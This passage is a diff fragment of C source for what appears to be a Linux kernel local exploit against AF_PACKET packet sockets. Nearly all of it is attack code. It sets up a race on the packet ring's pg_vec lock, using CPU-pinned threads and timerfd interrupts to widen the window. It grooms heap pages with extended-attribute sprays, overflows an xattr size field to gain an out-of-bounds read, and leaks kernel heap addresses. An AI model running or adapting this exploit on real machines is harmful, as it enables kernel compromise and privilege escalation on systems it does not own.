&t->epoll_events[i]); + } + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + for (int i = 1; i < t->total_timerfd; i++) + Close(t->timerfds[i]); + + Close(epollfd); + free(t->epoll_events); + free(t->timerfds); + + return NULL; +} + +void timerfd_waitlist_thread_wait_unshare_complete(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->unshare_complete) + pthread_cond_wait(&t->cond, &t->mutex); + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_send_work(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_wait_in_work(struct timerfd_waitlist_thread *t) +{ + while (t->tid == -1) { + ; + } + + while (!thread_in_sleep_state(t->tid)) { + ; + } +} + +void timerfd_waitlist_thread_wait_work_complete(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_quit(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct timerfd_waitlist_thread *timerfd_waitlist_thread_create(int timerfd) +{ + struct timerfd_waitlist_thread *t = Calloc(1, sizeof(*t)); + t->tid = -1; + t->timerfd = timerfd; + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + Pthread_create(&t->handle, NULL, timerfd_waitlist_thread_fn, t); + 
return t; +} + +void timerfd_waitlist_thread_destroy(struct timerfd_waitlist_thread *t) +{ + timerfd_waitlist_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct pg_vec_lock_thread_work *pg_vec_lock_thread_work_create(struct victim_packet_socket *v, int ifindex) +{ + struct pg_vec_lock_thread_work *w = Calloc(1, sizeof(*w)); + w->victim_packet_socket = v; + w->ifindex = ifindex; + return w; +} + +void pg_vec_lock_thread_work_destroy(struct pg_vec_lock_thread_work *w) +{ + free(w); +} + +void *pg_vec_lock_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct pg_vec_lock_thread *t = arg; + t->tid = gettid(); + + Setpriority(PRIO_PROCESS, 0, MAX_NICE); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct pg_vec_lock_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + struct sockaddr_ll addr = { .sll_ifindex = work->ifindex }; + struct msghdr msg = { .msg_name = &addr, .msg_namelen = sizeof(addr) }; + syscall(SYS_sendmsg, work->victim_packet_socket->fd, &msg, 0); + + pg_vec_lock_thread_work_destroy(work); + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + return NULL; +} + +void pg_vec_lock_thread_send_work(struct pg_vec_lock_thread *t, struct pg_vec_lock_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +struct timespec pg_vec_lock_thread_wait_in_work(struct pg_vec_lock_thread *t) +{ + while (!thread_in_sleep_state(t->tid)) { + ; + } + + struct timespec pg_vec_lock_acquire_time = {}; + syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &pg_vec_lock_acquire_time); + return pg_vec_lock_acquire_time; +} + +void 
pg_vec_lock_thread_wait_work_complete(struct pg_vec_lock_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_lock_thread_quit(struct pg_vec_lock_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct pg_vec_lock_thread *pg_vec_lock_thread_create(void) +{ + struct pg_vec_lock_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + t->tid = -1; + t->packet_socket = -1; + t->ifindex = -1; + Pthread_create(&t->handle, NULL, pg_vec_lock_thread_fn, t); + return t; +} + +void pg_vec_lock_thread_destroy(struct pg_vec_lock_thread *t) +{ + pg_vec_lock_thread_quit(t); + free(t); +} + +struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work_create( + struct victim_packet_socket *v, + bool exploit, + bool cleanup +) +{ + struct pg_vec_buffer_thread_work *w = Calloc(1, sizeof(*w)); + w->victim_packet_socket = v; + w->exploit = exploit; + w->cleanup = cleanup; + return w; +} + +void pg_vec_buffer_thread_work_destroy(struct pg_vec_buffer_thread_work *w) +{ + free(w); +} + +void *pg_vec_buffer_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct pg_vec_buffer_thread *t = arg; + t->tid = gettid(); + + int reclaim_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct pg_vec_buffer_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + if (work->exploit) { + struct tpacket_req3 free_pg_vec_req = {}; + syscall( + SYS_setsockopt, + work->victim_packet_socket->fd, + SOL_PACKET, + PACKET_RX_RING, + 
&free_pg_vec_req, + sizeof(free_pg_vec_req) + ); + + alloc_pages(reclaim_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16, PAGES_ORDER2_SIZE); + } + + if (work->cleanup) { + free_pages(reclaim_pg_vec_packet_socket); + } + + pg_vec_buffer_thread_work_destroy(work); + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + Close(reclaim_pg_vec_packet_socket); + return NULL; +} + +void pg_vec_buffer_thread_send_work(struct pg_vec_buffer_thread *t, struct pg_vec_buffer_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_buffer_thread_wait_in_work(struct pg_vec_buffer_thread *t) +{ + while (t->tid == -1) { + ; + } + + while (!thread_in_sleep_state(t->tid)) { + ; + } +} + +void pg_vec_buffer_thread_wait_work_complete(struct pg_vec_buffer_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_buffer_thread_quit(struct pg_vec_buffer_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct pg_vec_buffer_thread *pg_vec_buffer_thread_create(void) +{ + struct pg_vec_buffer_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + t->tid = -1; + Pthread_create(&t->handle, NULL, pg_vec_buffer_thread_fn, t); + return t; +} + +void pg_vec_buffer_thread_destroy(struct pg_vec_buffer_thread *t) +{ + pg_vec_buffer_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct tpacket_rcv_thread_work *tpacket_rcv_thread_work_create( + struct timespec pg_vec_lock_release_time, + struct timespec 
decrease_tpacket_rcv_thread_sleep_time, + struct msghdr *msg +) +{ + struct tpacket_rcv_thread_work *w = Calloc(1, sizeof(*w)); + w->pg_vec_lock_release_time = pg_vec_lock_release_time; + w->decrease_tpacket_rcv_thread_sleep_time = decrease_tpacket_rcv_thread_sleep_time; + w->msg = msg; + return w; +} + +void tpacket_rcv_thread_work_destroy(struct tpacket_rcv_thread_work *w) +{ + msghdr_destroy(w->msg); + free(w); +} + +void *tpacket_rcv_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct tpacket_rcv_thread *t = arg; + + int trigger_sendmsg_packet_socket = Socket(AF_PACKET, SOCK_PACKET, 0); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct tpacket_rcv_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + struct timespec cur_time = {}; + syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &cur_time); + struct timespec remaining_time_before_pg_vec_lock_release = timespec_sub( + work->pg_vec_lock_release_time, + cur_time + ); + + struct timespec sleep_duration = timespec_sub( + remaining_time_before_pg_vec_lock_release, + work->decrease_tpacket_rcv_thread_sleep_time + ); + + syscall(SYS_nanosleep, &sleep_duration, NULL); + syscall(SYS_sendmsg, trigger_sendmsg_packet_socket, work->msg, 0); + + tpacket_rcv_thread_work_destroy(work); + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + return NULL; +} + +void tpacket_rcv_thread_send_work(struct tpacket_rcv_thread *t, struct tpacket_rcv_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void tpacket_rcv_thread_wait_work_complete(struct tpacket_rcv_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while 
(!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void tpacket_rcv_thread_quit(struct tpacket_rcv_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct tpacket_rcv_thread *tpacket_rcv_thread_create(void) +{ + struct tpacket_rcv_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + Pthread_create(&t->handle, NULL, tpacket_rcv_thread_fn, t); + return t; +} + +void tpacket_rcv_thread_destroy(struct tpacket_rcv_thread *t) +{ + tpacket_rcv_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct msghdr *msghdr_create( + void *data, + size_t datalen, + const char *devname +) +{ + void *copy_data = Calloc(1, datalen); + if (data) + memcpy(copy_data, data, datalen); + + struct iovec *iov = Calloc(1, sizeof(*iov)); + iov->iov_base = copy_data; + iov->iov_len = datalen; + + struct sockaddr_pkt *addr = Calloc(1, sizeof(*addr)); + snprintf((char *)addr->spkt_device, sizeof(addr->spkt_device), "%s", devname); + struct msghdr *msghdr = Calloc(1, sizeof(*msghdr)); + msghdr->msg_namelen = sizeof(struct sockaddr_pkt); + msghdr->msg_name = addr; + msghdr->msg_iov = iov; + msghdr->msg_iovlen = 1; + return msghdr; +} + +void msghdr_destroy(struct msghdr *msghdr) +{ + struct iovec *iov = msghdr->msg_iov; + size_t iov_len = msghdr->msg_iovlen; + for (size_t i = 0; i < iov_len; i++) + free(iov[i].iov_base); + + free(iov); + struct sockaddr_pkt *addr = msghdr->msg_name; + free(addr); + free(msghdr); +} + +struct necessary_threads *necessary_threads_create(int timerfd) +{ + struct necessary_threads *nt = Calloc(1, sizeof(*nt)); + + nt->timerfd_waitlist_threads = Calloc(TOTAL_TIMERFD_WAITLIST_THREADS, sizeof(*nt->timerfd_waitlist_threads)); + for (int i = 0; i < 
TOTAL_TIMERFD_WAITLIST_THREADS; i++) + nt->timerfd_waitlist_threads[i] = timerfd_waitlist_thread_create(timerfd); + + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + timerfd_waitlist_thread_wait_unshare_complete(nt->timerfd_waitlist_threads[i]); + + nt->pg_vec_lock_thread = pg_vec_lock_thread_create(); + nt->pg_vec_buffer_thread = pg_vec_buffer_thread_create(); + nt->tpacket_rcv_thread = tpacket_rcv_thread_create(); + + return nt; +} + +void necessary_threads_destroy(struct necessary_threads *nt) +{ + for (int i = 0; i < TOTAL_TIMERFD_WAITLIST_THREADS; i++) + timerfd_waitlist_thread_destroy(nt->timerfd_waitlist_threads[i]); + + pg_vec_lock_thread_destroy(nt->pg_vec_lock_thread); + pg_vec_buffer_thread_destroy(nt->pg_vec_buffer_thread); + tpacket_rcv_thread_destroy(nt->tpacket_rcv_thread); + free(nt); +} + +void pages_order2_read_primitive_init(struct pages_order2_read_primitive *primitive) +{ + primitive->drain_pages_order2_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_1 = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_2 = Socket(AF_PACKET, SOCK_RAW, 0); + + struct tpacket_req3 tx_ring = {}; + tx_ring.tp_block_size = PAGES_ORDER1_SIZE; + tx_ring.tp_block_nr = 1; + tx_ring.tp_frame_size = PAGES_ORDER1_SIZE; + tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr; + + struct tpacket_req3 rx_ring = {}; + rx_ring.tp_block_size = PAGES_ORDER3_SIZE; + rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; + rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; + rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; + rx_ring.tp_sizeof_priv = 16248; + rx_ring.tp_retire_blk_tov = USHRT_MAX; + + struct sock_filter filter[MAX_FILTER_LEN] = {}; + for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { + filter[i].code = BPF_LD | BPF_IMM; + filter[i].k = 0xcafebabe; // Any value will work + } + + filter[MAX_FILTER_LEN - 
1].code = BPF_RET | BPF_K; + filter[MAX_FILTER_LEN - 1].k = sizeof(size_t); + + primitive->victim_packet_socket_config = victim_packet_socket_config_create( + (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo + (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr + tx_ring, // tx_ring + rx_ring, // rx_ring + 1, // packet_loss + TPACKET_V3, // packet_version + 30, // packet_reserve + filter // filter + ); + + struct simple_xattr_request *simple_xattr_request = NULL; + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + char value[XATTR_SIZE_MAX] = {}; + char name[XATTR_NAME_MAX + 1] = {}; + snprintf(name, sizeof(name), PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT, i); + snprintf(value, sizeof(value), PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT, i); + simple_xattr_request = simple_xattr_request_create( + PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, + name, + value, + KMALLOC_8K_SIZE + ); + + primitive->simple_xattr_requests[i] = simple_xattr_request; + } +} + +void pages_order2_read_primitive_cleanup(struct pages_order2_read_primitive *primitive) +{ + if (primitive->victim_packet_socket_config) { + victim_packet_socket_config_destroy(primitive->victim_packet_socket_config); + primitive->victim_packet_socket_config = NULL; + } + + if (primitive->drain_pages_order2_packet_socket != -1) { + Close(primitive->drain_pages_order2_packet_socket); + primitive->drain_pages_order2_packet_socket = -1; + } + + if (primitive->drain_pages_order3_packet_socket_1 != -1) { + Close(primitive->drain_pages_order3_packet_socket_1); + primitive->drain_pages_order3_packet_socket_1 = -1; + } + + if (primitive->drain_pages_order3_packet_socket_2 != -1) { + Close(primitive->drain_pages_order3_packet_socket_2); + primitive->drain_pages_order3_packet_socket_2 = -1; + } + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + if 
(primitive->simple_xattr_requests[i] && primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } + + /* Slots handed over to the overflowed/leaked request pointers are NULL. */ + if (primitive->simple_xattr_requests[i]) { + simple_xattr_request_destroy(primitive->simple_xattr_requests[i]); + primitive->simple_xattr_requests[i] = NULL; + } + } + + if (primitive->overflowed_simple_xattr_request) { + if (primitive->overflowed_simple_xattr_request->allocated) { + Removexattr( + primitive->overflowed_simple_xattr_request->filepath, + primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(primitive->overflowed_simple_xattr_request); + primitive->overflowed_simple_xattr_request = NULL; + } + } + + if (primitive->leaked_content_simple_xattr_request) { + if (primitive->leaked_content_simple_xattr_request->allocated) { + Removexattr( + primitive->leaked_content_simple_xattr_request->filepath, + primitive->leaked_content_simple_xattr_request->name + ); + + simple_xattr_request_destroy(primitive->leaked_content_simple_xattr_request); + primitive->leaked_content_simple_xattr_request = NULL; + } + } +} + +void pages_order2_read_primitive_page_drain(struct pages_order2_read_primitive *primitive) +{ + alloc_pages(primitive->drain_pages_order2_packet_socket, 1024, PAGES_ORDER2_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_1, 1024, PAGES_ORDER3_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_2, 512, PAGES_ORDER3_SIZE); +} + +void pages_order2_read_primitive_page_drain_cleanup(struct pages_order2_read_primitive *primitive) +{ + free_pages(primitive->drain_pages_order2_packet_socket); + free_pages(primitive->drain_pages_order3_packet_socket_2); +} + +void pages_order2_read_primitive_setup_simple_xattr(struct pages_order2_read_primitive *primitive) +{ + free_pages(primitive->drain_pages_order3_packet_socket_1); + + for (int i = 0; i < ARRAY_SIZE(primitive->simple_xattr_requests); i++) { + Setxattr( + 
primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name, + primitive->simple_xattr_requests[i]->value, + primitive->simple_xattr_requests[i]->value_size, + XATTR_CREATE + ); + + primitive->simple_xattr_requests[i]->allocated = true; + } + + for (int i = 512; i < ARRAY_SIZE(primitive->simple_xattr_requests); i += 128) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } +} + +void pages_order2_read_primitive_cleanup_simple_xattr(struct pages_order2_read_primitive *primitive) +{ + for (int i = 0; i < ARRAY_SIZE(primitive->simple_xattr_requests); i++) { + if (primitive->simple_xattr_requests[i] && primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } + } +} + +void pages_order2_read_primitive_main_work( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time +) +{ + u8 packet_data[128] = {}; + int dummy_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME); + *(size_t *)(packet_data) = XATTR_SIZE_MAX; + + struct pg_vec_lock_thread_work *pg_vec_lock_thread_work = NULL; + struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work = NULL; + struct tpacket_rcv_thread_work *tpacket_rcv_thread_work = NULL; + struct tpacket_rcv_thread_work_result *tpacket_rcv_thread_work_result = NULL; + struct msghdr *msghdr = NULL; + + struct victim_packet_socket_config *victim_packet_socket_config = primitive->victim_packet_socket_config; + struct timespec pg_vec_lock_timeout = { + .tv_sec = victim_packet_socket_config->sndtimeo.tv_sec, + .tv_nsec = 
victim_packet_socket_config->sndtimeo.tv_usec * NSEC_PER_USEC + }; + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct victim_packet_socket *victim_packet_socket = victim_packet_socket_create(victim_packet_socket_config); + pg_vec_lock_thread_work = pg_vec_lock_thread_work_create(victim_packet_socket, dummy_ifindex); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(victim_packet_socket, true, false); + msghdr = msghdr_create(packet_data, sizeof(packet_data), DUMMY_INTERFACE_NAME); + pages_order2_read_primitive_page_drain(primitive); + victim_packet_socket_configure(victim_packet_socket); + pages_order2_read_primitive_setup_simple_xattr(primitive); + + pg_vec_lock_thread_send_work(necessary_threads->pg_vec_lock_thread, pg_vec_lock_thread_work); + struct timespec pg_vec_lock_acquire_time = pg_vec_lock_thread_wait_in_work(necessary_threads->pg_vec_lock_thread); + network_interface_down(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_in_work(necessary_threads->pg_vec_buffer_thread); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + struct timespec pg_vec_lock_release_time = timespec_add(pg_vec_lock_acquire_time, pg_vec_lock_timeout); + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct itimerspec settime_value = {}; + settime_value.it_value = timespec_add(pg_vec_lock_release_time, timer_interrupt_amplitude); + Timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &settime_value, NULL); + + tpacket_rcv_thread_work = tpacket_rcv_thread_work_create(pg_vec_lock_release_time, decrease_tpacket_rcv_thread_sleep_time, msghdr); + tpacket_rcv_thread_send_work(necessary_threads->tpacket_rcv_thread, tpacket_rcv_thread_work); + tpacket_rcv_thread_wait_work_complete(necessary_threads->tpacket_rcv_thread); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + 
pg_vec_lock_thread_wait_work_complete(necessary_threads->pg_vec_lock_thread); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(NULL, false, true); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + victim_packet_socket_destroy(victim_packet_socket); +} + +bool pages_order2_read_primitive_build_primitive( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +) +{ + pages_order2_read_primitive_main_work( + primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + timer_interrupt_amplitude, + decrease_tpacket_rcv_thread_sleep_time + ); + + struct simple_xattr_request *overflowed_request = NULL; + struct simple_xattr_request *simple_xattr_request = NULL; + bool overflow_success = false; + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY && !overflow_success; i++) { + char value[KMALLOC_8K_SIZE] = {}; + + simple_xattr_request = primitive->simple_xattr_requests[i]; + if (!simple_xattr_request || !simple_xattr_request->allocated) + continue; + + ssize_t getxattr_ret = getxattr( + simple_xattr_request->filepath, + simple_xattr_request->name, + value, + KMALLOC_8K_SIZE + ); + + /* An overwritten size field no longer fits the 8K buffer, so getxattr() reports ERANGE. */ + if (getxattr_ret < 0 && errno == ERANGE) { + primitive->overflowed_simple_xattr_request = simple_xattr_request; + primitive->simple_xattr_requests[i] = NULL; + overflow_success = true; + } + } + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + pages_order2_read_primitive_page_drain_cleanup(primitive); + + if (!overflow_success) { + pages_order2_read_primitive_cleanup_simple_xattr(primitive); + } else { + Close(primitive->drain_pages_order2_packet_socket); + primitive->drain_pages_order2_packet_socket = -1; + 
Close(primitive->drain_pages_order3_packet_socket_1); + primitive->drain_pages_order3_packet_socket_1 = -1; + Close(primitive->drain_pages_order3_packet_socket_2); + primitive->drain_pages_order3_packet_socket_2 = -1; + } + + return overflow_success; +} + +struct pages_order2_read_primitive pages_order2_read_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd +) +{ + struct pages_order2_read_primitive pages_order2_read_primitive = {}; + pages_order2_read_primitive_init(&pages_order2_read_primitive); + + struct timespec pages_order2_read_primitive_sleep_decrease_amplitude = { .tv_nsec = 5000 }; + struct timespec pages_order2_read_primitive_timer_interrupt_amplitude = { .tv_nsec = 150000 }; + + bool pages_order2_read_primitive_build_success = false; + while (!pages_order2_read_primitive_build_success) { + pages_order2_read_primitive_build_success = pages_order2_read_primitive_build_primitive( + &pages_order2_read_primitive, + necessary_threads, + configure_network_interface_socket, + timerfd, + pages_order2_read_primitive_sleep_decrease_amplitude, + pages_order2_read_primitive_timer_interrupt_amplitude + ); + + if (pages_order2_read_primitive_build_success) { + if (!pages_order2_read_primitive_build_leaked_simple_xattr(&pages_order2_read_primitive)) { + pages_order2_read_primitive_cleanup(&pages_order2_read_primitive); + pages_order2_read_primitive_init(&pages_order2_read_primitive); + pages_order2_read_primitive_build_success = false; + } + } + } + + return pages_order2_read_primitive; +} + +void *pages_order2_read_primitive_trigger(struct pages_order2_read_primitive *pages_order2_read_primitive) +{ + void *leak_data = Calloc(1, XATTR_SIZE_MAX); + Getxattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name, + leak_data, + XATTR_SIZE_MAX + ); + + return leak_data; +} + +bool 
pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive) +{ + void *leak_data = pages_order2_read_primitive_trigger(pages_order2_read_primitive); + struct simple_xattr *leaked_simple_xattrs = leak_data + PAGES_ORDER2_SIZE - sizeof(struct simple_xattr); + struct simple_xattr *leaked_simple_xattr = NULL; + int leaked_simple_xattr_count = (XATTR_SIZE_MAX - (PAGES_ORDER2_SIZE - sizeof(struct simple_xattr))) / PAGES_ORDER2_SIZE; + int simple_xattr_requests_idx = -1; + int leaked_simple_xattrs_idx = -1; + bool found_leaked_simple_xattr = false; + + for (int i = 0; i < leaked_simple_xattr_count && !found_leaked_simple_xattr; i++) { + leaked_simple_xattr = &leaked_simple_xattrs[i]; + + if (!is_data_look_like_simple_xattr(leaked_simple_xattr, KMALLOC_8K_SIZE)) + continue; + else { + simple_xattr_dump(leaked_simple_xattr); + } + + u8 *leaked_simple_xattr_value = leaked_simple_xattr->value; + + if ( + strncmp( + leaked_simple_xattr_value, + PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN, + strlen(PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN) + ) != 0 + ) { + continue; + } + + if (sscanf(leaked_simple_xattr_value, PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT, &simple_xattr_requests_idx) != 1) + continue; + + if (simple_xattr_requests_idx < 0 || simple_xattr_requests_idx >= TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY) + continue; + + pages_order2_read_primitive->leaked_content_simple_xattr_request = pages_order2_read_primitive->simple_xattr_requests[simple_xattr_requests_idx]; + pages_order2_read_primitive->simple_xattr_requests[simple_xattr_requests_idx] = NULL; + leaked_simple_xattrs_idx = i; + found_leaked_simple_xattr = true; + } + + if (!found_leaked_simple_xattr) { + free(leak_data); + + Removexattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name + ); + + 
simple_xattr_request_destroy(pages_order2_read_primitive->overflowed_simple_xattr_request); + pages_order2_read_primitive->overflowed_simple_xattr_request = NULL; + + pages_order2_read_primitive_cleanup_simple_xattr(pages_order2_read_primitive); + return false; + } + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + if (pages_order2_read_primitive->simple_xattr_requests[i] && pages_order2_read_primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + pages_order2_read_primitive->simple_xattr_requests[i]->filepath, + pages_order2_read_primitive->simple_xattr_requests[i]->name + ); + + pages_order2_read_primitive->simple_xattr_requests[i]->allocated = false; + } + } + + free(leak_data); + leak_data = pages_order2_read_primitive_trigger(pages_order2_read_primitive); + leaked_simple_xattrs = leak_data + PAGES_ORDER2_SIZE - sizeof(struct simple_xattr); + leaked_simple_xattr = &leaked_simple_xattrs[leaked_simple_xattrs_idx]; + + u64 next = (u64)(leaked_simple_xattr->list.next); + u64 prev = (u64)(leaked_simple_xattr->list.prev); + u64 overflowed_simple_xattr_kernel_address = 0; + + if ((next & (PAGES_ORDER2_SIZE - 1)) == 0) { + overflowed_simple_xattr_kernel_address = next; + } else if ((prev & (PAGES_ORDER2_SIZE - 1)) == 0) { + overflowed_simple_xattr_kernel_address = prev; + } + + pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = overflowed_simple_xattr_kernel_address; + 